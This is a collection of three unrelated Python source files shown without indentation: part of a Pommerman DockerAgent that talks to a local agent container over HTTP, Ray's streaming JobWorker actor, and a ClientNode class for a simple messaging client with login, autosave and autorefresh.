req = requests.get(request_url)
self._acknowledged = True
return True
except requests.exceptions.ConnectionError as e:
print("ConnectionError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except requests.exceptions.HTTPError as e:
print("HTTPError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except docker.errors.APIError as e:
print("This is a Docker error. Please fix: ", e)
raise
def init_agent(self, id, game_type):
super(DockerAgent, self).init_agent(id, game_type)
request_url = "http://localhost:{}/init_agent".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={
"id": json.dumps(id, cls=utility.PommermanJSONEncoder),
"game_type": json.dumps(game_type, cls=utility.PommermanJSONEncoder)
})
except requests.exceptions.Timeout as e:
print('Timeout in init_agent()!')
def act(self, obs, action_space):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
request_url = "http://localhost:{}/action".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.15,
json={
"obs":
obs_serialized,
"action_space":
json.dumps(action_space, cls=utility.PommermanJSONEncoder)
})
action = req.json()['action']
except requests.exceptions.Timeout as e:
print('Timeout!')
# TODO: Fix this. It's ugly.
num_actions = len(action_space.shape)
if num_actions > 1:
return [0] * num_actions
else:
return 0
return action
def episode_end(self, reward):
request_url = "http://localhost:{}/episode_end".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={
"reward": json.dumps(reward, cls=utility.PommermanJSONEncoder)
})
except requests.exceptions.Timeout as e:
print('Timeout in episode_end()!')
def shutdown(self):
request_url = "http://localhost:{}/shutdown".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={ })
except requests.exceptions.Timeout as e:
print('Timeout in shutdown()!')
print("Stopping container..")
if self._container:
try:
return self._container.remove(force=True)
except docker.errors.NotFound as e:
return True
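# Editor's note (not part of the original module): the HTTP contract the agent
# container is expected to serve, inferred from the requests issued above --
#     GET  /ping          liveness probe polled by _wait_for_docker()
#     POST /init_agent    json: {"id": ..., "game_type": ...}
#     POST /action        json: {"obs": ..., "action_space": ...} -> {"action": ...}
#     POST /episode_end   json: {"reward": ...}
#     POST /shutdown      json: {}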
|
jobworker.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import pickle
import threading
import ray
import ray.streaming._streaming as _streaming
from ray.streaming.config import Config
from ray.function_manager import FunctionDescriptor
from ray.streaming.communication import DataInput, DataOutput
logger = logging.getLogger(__name__)
@ray.remote
class JobWorker:
"""A streaming job worker.
Attributes:
worker_id: The id of the instance.
input_channels: The input gate that manages input channels of
the instance (see: DataInput in communication.py).
output_channels (DataOutput): The output gate that manages output
channels of the instance (see: DataOutput in communication.py).
        operator: The operator instance executed by this worker.
"""
def __init__(self, worker_id, operator, input_channels, output_channels):
self.env = None
self.worker_id = worker_id
self.operator = operator
processor_name = operator.processor_class.__name__
processor_instance = operator.processor_class(operator)
self.processor_name = processor_name
self.processor_instance = processor_instance
self.input_channels = input_channels
self.output_channels = output_channels
self.input_gate = None
self.output_gate = None
self.reader_client = None
self.writer_client = None
def init(self, env):
"""init streaming actor"""
env = pickle.loads(env)
self.env = env
logger.info("init operator instance %s", self.processor_name)
if env.config.channel_type == Config.NATIVE_CHANNEL:
core_worker = ray.worker.global_worker.core_worker
reader_async_func = FunctionDescriptor(
__name__, self.on_reader_message.__name__,
self.__class__.__name__)
reader_sync_func = FunctionDescriptor(
__name__, self.on_reader_message_sync.__name__,
self.__class__.__name__)
self.reader_client = _streaming.ReaderClient(
core_worker, reader_async_func, reader_sync_func)
writer_async_func = FunctionDescriptor(
__name__, self.on_writer_message.__name__,
self.__class__.__name__)
writer_sync_func = FunctionDescriptor(
__name__, self.on_writer_message_sync.__name__,
self.__class__.__name__)
self.writer_client = _streaming.WriterClient(
core_worker, writer_async_func, writer_sync_func)
if len(self.input_channels) > 0:
self.input_gate = DataInput(env, self.input_channels)
self.input_gate.init()
if len(self.output_channels) > 0:
self.output_gate = DataOutput(
env, self.output_channels,
self.operator.partitioning_strategies)
self.output_gate.init()
logger.info("init operator instance %s succeed", self.processor_name)
return True
# Starts the actor
def start(self):
self.t = threading.Thread(target=self.run, daemon=True)
self.t.start()
actor_id = ray.worker.global_worker.actor_id
logger.info("%s %s started, actor id %s", self.__class__.__name__,
self.processor_name, actor_id)
def run(self):
logger.info("%s start running", self.processor_name)
self.processor_instance.run(self.input_gate, self.output_gate)
logger.info("%s finished running", self.processor_name)
self.close()
def close(self):
if self.input_gate:
self.input_gate.close()
if self.output_gate:
self.output_gate.close()
def is_finished(self):
return not self.t.is_alive()
def on_reader_message(self, buffer: bytes):
"""used in direct call mode"""
self.reader_client.on_reader_message(buffer)
def on_reader_message_sync(self, buffer: bytes):
"""used in direct call mode"""
if self.reader_client is None:
return b" " * 4 # special flag to indicate this actor not ready
result = self.reader_client.on_reader_message_sync(buffer)
return result.to_pybytes()
def on_writer_message(self, buffer: bytes):
"""used in direct call mode"""
self.writer_client.on_writer_message(buffer)
def on_writer_message_sync(self, buffer: bytes):
"""used in direct call mode"""
if self.writer_client is None:
return b" " * 4 # special flag to indicate this actor not ready
result = self.writer_client.on_writer_message_sync(buffer)
return result.to_pybytes()
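# Editor's note: an illustrative, never-called sketch (not part of the original
# module) of how a JobWorker actor is typically driven; `operator`, the channel
# lists and `env` are assumed to be built by the surrounding streaming runtime.
def _example_job_worker_usage(worker_id, operator, in_channels, out_channels, env):
    worker = JobWorker.remote(worker_id, operator, in_channels, out_channels)
    ray.get(worker.init.remote(pickle.dumps(env)))  # set up gates and channel clients
    worker.start.remote()                           # run the processor in a daemon thread
    return worker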
|
ClientNode.py
|
from utils.StorageUtility import StorageUtility
from ClientDatabase import ClientDatabase
from ServerConnection import ServerConnection
from data_classes.Message import Message
from data_classes.PublicInfo import PublicInfo
from data_classes.UserInfo import UserInfo
from threading import Thread, Event
class ClientNode:
def __init__(self, host_address: str, username: str, password: str):
"""Initializes the data fields for the ClientNode object and sets
the username and password fields"""
self.__host_address = host_address
self.__username = username
self.__password = password
self.__database: ClientDatabase = None
self.__server_connection: ServerConnection = None
self.__on_new_messages_received = lambda messages: None
self.__on_new_server_public_info = lambda public_info: None
self.__storage_utility = StorageUtility(f'{username}_client_database.txt')
self.__is_online = False
self.__autorefresh_on = False
def login(self):
"""Sets up the ClientNode by attempting to load from an existing saved database
or attempting to restore user information from the server. Assumes that there is an
        account on the server corresponding to this user. Returns False if the login fails"""
# create a ServerConnection object
if self.__server_connection is None:
self.__server_connection = ServerConnection(self.__host_address, self.__username, self.__password)
# attempt to log in the user
response = self.__server_connection.login_user()
if response != 'success':
return False
# set the online flag
self.__is_online = True
# attempt to load from a save file. If unsuccessful, restore from server:
db = self.__storage_utility.load()
if db is not None:
self.__database = db
else:
self.__database = ClientDatabase(self.__username, self.__password)
self.restore_user_info()
self.__storage_utility.save(self.__database)
# begin autosaving the database at the file path every 5 minutes
self.__storage_utility.start_autosave(self.__database, timespan=300)
# begin refreshing every 5 seconds
self.start_autorefresh(timeout=5)
return True
def register_user(self):
"""Registers a new account for this user with the server and sets up a database to store
this user's info on the local computer. Returns True if successful and False otherwise"""
# create a ServerConnection object
self.__server_connection = ServerConnection(self.__host_address, self.__username, self.__password)
# register this user to the server
response = self.__server_connection.register_new_user()
if response != 'success':
return False
else:
return True
def logout(self):
"""Logs the user out by changing their status to offline in the server and sets the is_online flag
to false"""
# change public info to offline
public_info = PublicInfo(status_tag=PublicInfo.OFFLINE)
self.set_user_public_info(public_info)
# change online flag to false
self.__is_online = False
# stop autosaving
self.__storage_utility.stop_autosave()
self.__storage_utility.save(self.__database)
        # stop autorefreshing
self.stop_autorefresh()
return True
def set_on_new_messages_received(self, target):
"""sets the specified target function to be performed on a list of new messages whenever
new messages are received. The target function should accept a list of Message objects as an argument"""
if self.__is_online:
raise ClientNodeException('This change cannot be made while the node is online')
self.__on_new_messages_received = target
def set_on_new_server_public_info(self, target):
"""sets the specified target function to be performed on a dictionary of public_info whenever
new server public information is received. The target function should accept a dictionary of PublicInfo
objects keyed by username"""
if self.__is_online:
raise ClientNodeException('This change cannot be made while the node is online')
self.__on_new_server_public_info = target
def get_inbox(self):
"""Returns the user's inbox"""
self.__assert_online()
return self.__database.get_inbox()
def get_outbox(self):
"""Returns the user's outbox"""
self.__assert_online()
return self.__database.get_outbox()
def send_message(self, m: Message):
"""Sends the message to the server and updates the user's database with the message.
        Returns True if successful and False otherwise"""
self.__assert_online()
response = self.__server_connection.send_message(m)
if not response == 'success':
print(response)
return False
try:
self.__database.add_message(m)
except ValueError:
return False
return True
def delete_message(self, m: Message):
"""Deletes the specified message from the client database"""
self.__assert_online()
self.__database.delete_message(m)
return True
def get_user_public_info(self):
"""Returns the public info object for this user"""
return self.__database.get_public_info()
def set_user_public_info(self, p: PublicInfo):
"""Sends the public_info object to the server and updates the user's database
        with the public_info object. Returns True if successful and False otherwise"""
self.__assert_online()
response = self.__server_connection.update_public_info(p)
if not response == 'success':
return False
try:
self.__database.set_public_info(p)
except ValueError:
return False
return True
def get_server_public_info(self):
"""Gets the server public info from the database and returns it."""
self.__assert_online()
return self.__database.get_server_public_info()
def get_user_list(self):
"""Returns a list of usernames registered on the server"""
self.__assert_online()
return list(self.get_server_public_info().keys())
def start_autorefresh(self, timeout: int = 30):
"""Begins automatically refreshing the connection with the server at the interval
of time specified by timeout (seconds)"""
self.__assert_online()
self.__autorefresh_on = True
Thread(target=self.__autorefresh_loop, args=(timeout,), daemon=True).start()
def stop_autorefresh(self):
"""Stops the autorefresh cycle"""
self.__autorefresh_on = False
def refresh(self):
"""Refreshes the client node by requesting new messages and new server public info from
        the server. If any is received, it handles it by updating the database and calling the
        on_new_messages_received and on_new_server_public_info functions"""
self.__assert_online()
# get new messages
messages = self.__server_connection.get_new_messages()
# if there are any new messages, add them to database and process them
if len(messages) > 0:
self.get_inbox().extend(messages)
self.__on_new_messages_received(messages)
# get new server public info
server_public_info = self.__server_connection.get_server_public_info()
# if server public info is not None, update the database and process the changes
if server_public_info is not None:
self.__database.set_server_public_info(server_public_info)
self.__on_new_server_public_info(server_public_info)
def __autorefresh_loop(self, timeout: int):
"""Refreshes the client node at the interval of time specified by the paramenter timeout (seconds)"""
while self.__autorefresh_on:
self.refresh()
Event().wait(timeout)
def restore_user_info(self):
"""Obtains the server's UserInfo object for this user and overwrites the database with this object.
        Effectively restores any messages that may have been deleted from the inbox or outbox of the user.
        Returns True if successful and False otherwise"""
self.__assert_online()
# get the userinfo object and save it to the database
user_info = self.__server_connection.get_user_info()
try:
assert type(user_info) == UserInfo
except AssertionError:
return False
self.__database.set_user_info(user_info)
# get the server public info and save it to the database
self.__server_connection.update_public_info(self.get_user_public_info())
public_info = self.__server_connection.get_server_public_info()
try:
assert type(public_info) == dict
except AssertionError:
return False
self.__database.set_server_public_info(public_info)
return True
def __assert_online(self):
if not self.__is_online:
raise ClientNodeException(f'Client node for user {self.__username} is offline')
class ClientNodeException(BaseException):
pass
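# Editor's note: an illustrative, never-called sketch (not part of the original
# module); the host, username and password below are placeholders.
def _example_client_session():
    node = ClientNode('127.0.0.1', 'alice', 'secret')
    # callbacks must be registered before login(), which sets the node online
    node.set_on_new_messages_received(lambda msgs: print(f'{len(msgs)} new message(s)'))
    if not node.login():
        node.register_user()               # first run: create the account, then log in
        node.login()
    # ... exchange messages via node.send_message(...) / node.get_inbox() ...
    node.logout()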
|